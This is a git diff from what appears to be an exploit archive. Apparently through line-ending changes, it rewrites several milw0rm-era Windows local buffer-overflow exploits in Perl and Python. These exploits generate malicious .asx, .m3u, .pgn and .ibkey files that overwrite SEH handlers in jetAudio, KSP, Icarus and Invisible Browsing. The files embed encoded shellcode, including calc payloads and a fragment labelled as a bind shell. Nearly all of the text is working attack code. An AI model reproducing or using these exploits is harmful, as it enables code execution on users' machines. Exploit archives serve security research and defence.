+"\x45\x34\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51\x50\x44\x4c\x4c" +"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e" +"\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48" +"\x56\x42\x46\x50\x53\x43\x56\x43\x58\x50\x33\x50\x32\x43\x58" +"\x43\x47\x43\x43\x47\x42\x51\x4f\x51\x44\x4b\x4f\x48\x50\x45" +"\x38\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e\x36" +"\x51\x4f\x4b\x39\x4d\x35\x45\x36\x4d\x51\x4a\x4d\x43\x38\x44" +"\x42\x50\x55\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x43\x58\x49\x49" +"\x43\x39\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x51\x43\x46" +"\x33\x46\x33\x46\x33\x50\x53\x50\x43\x51\x43\x51\x53\x50\x53" +"\x4b\x4f\x48\x50\x42\x46\x42\x48\x42\x31\x51\x4c\x43\x56\x46" +"\x33\x4c\x49\x4b\x51\x4d\x45\x45\x38\x4e\x44\x44\x5a\x42\x50" +"\x48\x47\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x46\x31\x46" +"\x35\x4b\x4f\x4e\x30\x42\x48\x4e\x44\x4e\x4d\x46\x4e\x4d\x39" +"\x50\x57\x4b\x4f\x49\x46\x51\x43\x51\x45\x4b\x4f\x4e\x30\x45" +"\x38\x4b\x55\x51\x59\x4b\x36\x51\x59\x50\x57\x4b\x4f\x49\x46" +"\x46\x30\x46\x34\x50\x54\x51\x45\x4b\x4f\x48\x50\x4d\x43\x45" +"\x38\x4a\x47\x43\x49\x48\x46\x44\x39\x50\x57\x4b\x4f\x48\x56" +"\x50\x55\x4b\x4f\x48\x50\x43\x56\x42\x4a\x45\x34\x43\x56\x43" +"\x58\x43\x53\x42\x4d\x4c\x49\x4a\x45\x43\x5a\x50\x50\x46\x39" +"\x46\x49\x48\x4c\x4b\x39\x4d\x37\x43\x5a\x50\x44\x4c\x49\x4b" +"\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46\x4d" +"\x4b\x4e\x51\x52\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38\x4e" +"\x4b\x4e\x4b\x4e\x4b\x43\x58\x44\x32\x4b\x4e\x4e\x53\x45\x46" +"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x51" +"\x42\x50\x51\x50\x51\x50\x51\x43\x5a\x43\x31\x50\x51\x46\x31" +"\x51\x45\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59\x43" +"\x35\x48\x4e\x46\x33\x4b\x4f\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f" +"\x46\x57\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4b\x33\x49" +"\x54\x45\x34\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x45\x38" +"\x4c\x30\x4d\x5a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x49\x46\x4b" 
+"\x4f\x48\x50\x41\x41") + +payload = "\x41" * 420 # seh overwritten at 1224 +nops = "\x90" * 100 # Nop Sled +sc = shellcode # bind shell 695 bytes +near_jmp = "\xe9\x10\xfd\xff\xff" # near jump back -752 bytes +seh = "\x6a\x19\x9a\x0f" # 0x0f9a196a pop ebp; pop ebx; ret from [C:\WINDOWS\system32\VBAJET32.dll] +next_seh = "\xeb\xf9\xff\xff" # short jump back -7 +junk = "\x43" * 572 # junk buffer + + +print "[+] Creating malicious playlist" +try: + file = open("exploit.m3u",'w') + file.write(payload + nops + sc + near_jmp + next_seh + seh + junk) + file.close() + print "[+] File created successfully" +except: + print "[x] Could not create file" + sys.exit(0) + +# milw0rm.com [2009-09-09] diff --git a/platforms/windows/local/9619.pl b/platforms/windows/local/9619.pl index 2104d22a4..776dddb8f 100755 --- a/platforms/windows/local/9619.pl +++ b/platforms/windows/local/9619.pl 
@@ -1,46 +1,46 @@ -#!/usr/bin/perl -# Found By :: HACK4LOVE -# hack4love@hotmail.com -# jetAudio v 7.1.9.4030 plus vx(asx/wax/wvx)Universal Local BOF (SEH) -####################################################################### -# use-->>open file-->>hac4love.asx >>>after that just move the mouse to -## information box in the jetAudio program without click boom calc !!! -####################################################################### -##http://www.jetaudio.com/ -####################################################################### -## work sooooooo good have fun -####################################################################### -my $bof="http://"."\x41" x 1017; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xc3\x20\x40\x5f";##C:\Program Files\JetAudio\MFC42.DLL -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". 
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.asx'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-09-09] +#!/usr/bin/perl +# Found By :: HACK4LOVE +# hack4love@hotmail.com +# jetAudio v 7.1.9.4030 plus vx(asx/wax/wvx)Universal Local BOF (SEH) +####################################################################### +# use-->>open file-->>hac4love.asx >>>after that just move the mouse to +## information box in the jetAudio program without click boom calc !!! +####################################################################### +##http://www.jetaudio.com/ +####################################################################### +## work sooooooo good have fun +####################################################################### +my $bof="http://"."\x41" x 1017; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xc3\x20\x40\x5f";##C:\Program Files\JetAudio\MFC42.DLL +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". 
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.asx'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-09-09] diff --git a/platforms/windows/local/9624.py b/platforms/windows/local/9624.py index 60d2ae741..0a1732b7e 100755 --- a/platforms/windows/local/9624.py +++ b/platforms/windows/local/9624.py 
@@ -1,51 +1,51 @@ -##!/usr/bin/python -# Found By :: HACK4LOVE -# hack4love@hotmail.com -# KSP 2009R2 (m3u) Universal Local Buffer Exploit (SEH) -# http://ksplayer.boo.pl/index.php -# #--->> info:: KSP 2009R2 Sound Player was released 28//8//2009 -# AND special THANKS FOR His0k4# -###################################################################### -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" -"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x58\x4e\x47" -"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58" -"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" -"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48" -"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x34" -"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58" -"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x47" -"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b" -"\x42\x30\x42\x50\x42\x30\x4b\x58\x4a\x56\x4e\x43\x4f\x35\x41\x33" -"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" -"\x42\x45\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x59" -"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56" -"\x4e\x36\x43\x56\x42\x30\x5a") -######################################################################### -buffer = shellcode -buffer += "\x41"*(2869-len(shellcode)) -buffer += "\xE8\xC6\xF4\xFF\xFF" 
-buffer += "\x90"*10 -buffer += "\xEB\xEF\x90\x90" -buffer += "\x88\x57\x40" - -print buffer -######################################################################### -try: -out_file = open("hack4love.m3u",'w') -out_file.write(buffer) -out_file.close() -raw_input("\nExploit file created!\n") -except: -print "Error" -######################################################################## - -# milw0rm.com [2009-09-10] +##!/usr/bin/python +# Found By :: HACK4LOVE +# hack4love@hotmail.com +# KSP 2009R2 (m3u) Universal Local Buffer Exploit (SEH) +# http://ksplayer.boo.pl/index.php +# #--->> info:: KSP 2009R2 Sound Player was released 28//8//2009 +# AND special THANKS FOR His0k4# +###################################################################### +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" +"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x58\x4e\x47" +"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58" +"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" +"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48" +"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x34" +"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58" +"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x47" +"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b" +"\x42\x30\x42\x50\x42\x30\x4b\x58\x4a\x56\x4e\x43\x4f\x35\x41\x33" 
+"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" +"\x42\x45\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x59" +"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56" +"\x4e\x36\x43\x56\x42\x30\x5a") +######################################################################### +buffer = shellcode +buffer += "\x41"*(2869-len(shellcode)) +buffer += "\xE8\xC6\xF4\xFF\xFF" +buffer += "\x90"*10 +buffer += "\xEB\xEF\x90\x90" +buffer += "\x88\x57\x40" + +print buffer +######################################################################### +try: +out_file = open("hack4love.m3u",'w') +out_file.write(buffer) +out_file.close() +raw_input("\nExploit file created!\n") +except: +print "Error" +######################################################################## + +# milw0rm.com [2009-09-10] diff --git a/platforms/windows/local/9628.pl b/platforms/windows/local/9628.pl index bf60a6b72..b2563ccd6 100755 --- a/platforms/windows/local/9628.pl +++ b/platforms/windows/local/9628.pl 
@@ -1,42 +1,42 @@ -#!/user/bin/perl -#Icarus 2.0 (.PGn File)Universal Local BOF (SEH) -#tested on win SP2 -#origenal exploit : http://milw0rm.com/exploits/8236 -#Author: germaya_x & D3v!LFUCK3R -#Download :http://www.randomsoftware.com/pub/icarus.exe -#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :) -#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com :) -############################################################# -my $bof="A" x 332 ; -my $NEXT_sEh="\xEB\x06\x90\x90"; -my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". 
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -################################################################### -open(myfile,'>> germaya_x.pgn'); -print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec; -################################################################### - -# milw0rm.com [2009-09-10] +#!/user/bin/perl +#Icarus 2.0 (.PGn File)Universal Local BOF (SEH) +#tested on win SP2 +#origenal exploit : http://milw0rm.com/exploits/8236 +#Author: germaya_x & D3v!LFUCK3R +#Download :http://www.randomsoftware.com/pub/icarus.exe +#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :) +#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com :) +############################################################# +my $bof="A" x 332 ; +my $NEXT_sEh="\xEB\x06\x90\x90"; +my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". 
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +################################################################### +open(myfile,'>> germaya_x.pgn'); +print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec; +################################################################### + +# milw0rm.com [2009-09-10] diff --git a/platforms/windows/local/963.c b/platforms/windows/local/963.c index c8b701bed..0984b7c56 100755 --- a/platforms/windows/local/963.c +++ b/platforms/windows/local/963.c @@ -146,6 +146,6 @@ int main() printf("Phone Number : %s\n",PhoneNumber); return 0; -} - -// milw0rm.com [2005-04-28] +} + +// milw0rm.com [2005-04-28] diff --git a/platforms/windows/local/964.c b/platforms/windows/local/964.c index 708c59a82..9b6db0554 100755 --- a/platforms/windows/local/964.c +++ b/platforms/windows/local/964.c @@ -70,6 +70,6 @@ found!"); } else printf("FilePocket is not installed on your system!\n"); return 0; -} - -// milw0rm.com [2005-04-28] +} + +// milw0rm.com [2005-04-28] diff --git a/platforms/windows/local/965.c b/platforms/windows/local/965.c index 5a50228ae..078dbe3f9 100755 --- a/platforms/windows/local/965.c +++ b/platforms/windows/local/965.c @@ -139,6 +139,6 @@ int main() */ return 0; -} - -// milw0rm.com [2005-04-28] +} + +// milw0rm.com [2005-04-28] diff --git a/platforms/windows/local/9655.pl b/platforms/windows/local/9655.pl index c7f1e8441..f4fbab44e 100755 --- a/platforms/windows/local/9655.pl +++ b/platforms/windows/local/9655.pl 
@@ -1,40 +1,40 @@
-#!/usr/bin/perl
-
-print qq(
- ############################################################
- ## Iranian Pentesters Home ##
- ## Www.Pentesters.Ir ##
- ## PLATEN -[ H.jafari ]- ##
- ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ##
- ## bug found & exploited by: PLATEN ##
- ## E-mail && blog: ##
- ## hjafari.blogspot.com ##
- ## platen.secure[at]gmail[dot]com ##
- ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
- ## and all members in Pentesters.ir ##
- ############################################################
-);
-# Note: I just test this version
-$junk ="\x41"x 5000;
-$ret = "\x93\x43\x92\x7c";
-$nop = "\x90" x 50;
-# win32_exec - Size=160
-#EXITFUNC=seh CMD=calc
-#Encoder=PexFnstenvSub http://metasploit.com
-$shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
-"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
-"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
-"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
-"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
-"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
-"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
-"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
-"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
-"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
-open(fhandle,'>>expl.ibkey');
-print fhandle $junk.$ret.$nop.$shellcode;
-close(fhandle);
-print "\n [+] File created successfully: expl.ibkey \n";
-
-# milw0rm.com [2009-09-14]
+#!/usr/bin/perl
+
+print qq(
+ ############################################################
+ ## Iranian Pentesters Home ##
+ ## Www.Pentesters.Ir ##
+ ## PLATEN -[ H.jafari ]- ##
+ ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ##
+ ## bug found & exploited by: PLATEN ##
+ ## E-mail && blog: ##
+ ## hjafari.blogspot.com ##
+ ## platen.secure[at]gmail[dot]com ##
+ ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
+ ## and all members in Pentesters.ir ##
+ ############################################################
+);
+# Note: I just test this version
+$junk ="\x41"x 5000;
+$ret = "\x93\x43\x92\x7c";
+$nop = "\x90" x 50;
+# win32_exec - Size=160
+#EXITFUNC=seh CMD=calc
+#Encoder=PexFnstenvSub http://metasploit.com
+$shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
+"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
+"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
+"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
+"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
+"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
+"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
+"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
+"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
+"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
+open(fhandle,'>>expl.ibkey');
+print fhandle $junk.$ret.$nop.$shellcode;
+close(fhandle);
+print "\n [+] File created successfully: expl.ibkey \n";
+
+# milw0rm.com [2009-09-14]
diff --git a/platforms/windows/local/9659.cpp b/platforms/windows/local/9659.cpp
index bc79619ca..e3914e50d 100755
--- a/platforms/windows/local/9659.cpp
+++ b/platforms/windows/local/9659.cpp
